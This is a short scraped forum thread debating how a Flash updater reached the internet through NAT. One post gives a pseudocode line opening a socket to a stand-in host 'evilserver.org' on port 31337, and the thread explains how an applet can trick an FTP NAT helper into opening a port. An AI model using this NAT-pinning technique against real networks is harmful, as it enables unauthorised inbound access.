Adobe Flash Updater accessed internet....but how?

XMLSocket foo = new XMLSocket("evilserver.org",31337); foo.setLocalPort(135); XMLRequest bar = new XMlRequest("whatever"); foo.sendrequest(bar);

There's nothing exploited, it's just the way NAT works.

Or, even simpler:

Nothing exploited, that's just how FTP NAT helpers work.

Aside from even the simplest load balancing breaking? Just take any sufficiently complex protocol, f.e. various P2P protocols, various computer games, VoIP applications...

I don't have too, since this is solely your claim so far.

It's basically a Java or Flash applet acting as a FTP client, using the PORT command, the FTP NAT helper parsing the command and adding an appropriate NAT table entry. There's nothing wrong with this, it justs void some false security assumptions about NAT.

Reply to
Sebastian G.
Loading thread data ...

just as information. Sebastian G. here is not Sebastian Gottschall (BrainSlayer), even if he seems to live in the same town or area. but i found out that 2 persons with the same name are living here, if i look at the student list here at the university

thx, Sebastian Gottschall

Reply to
BrainSlayer

Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.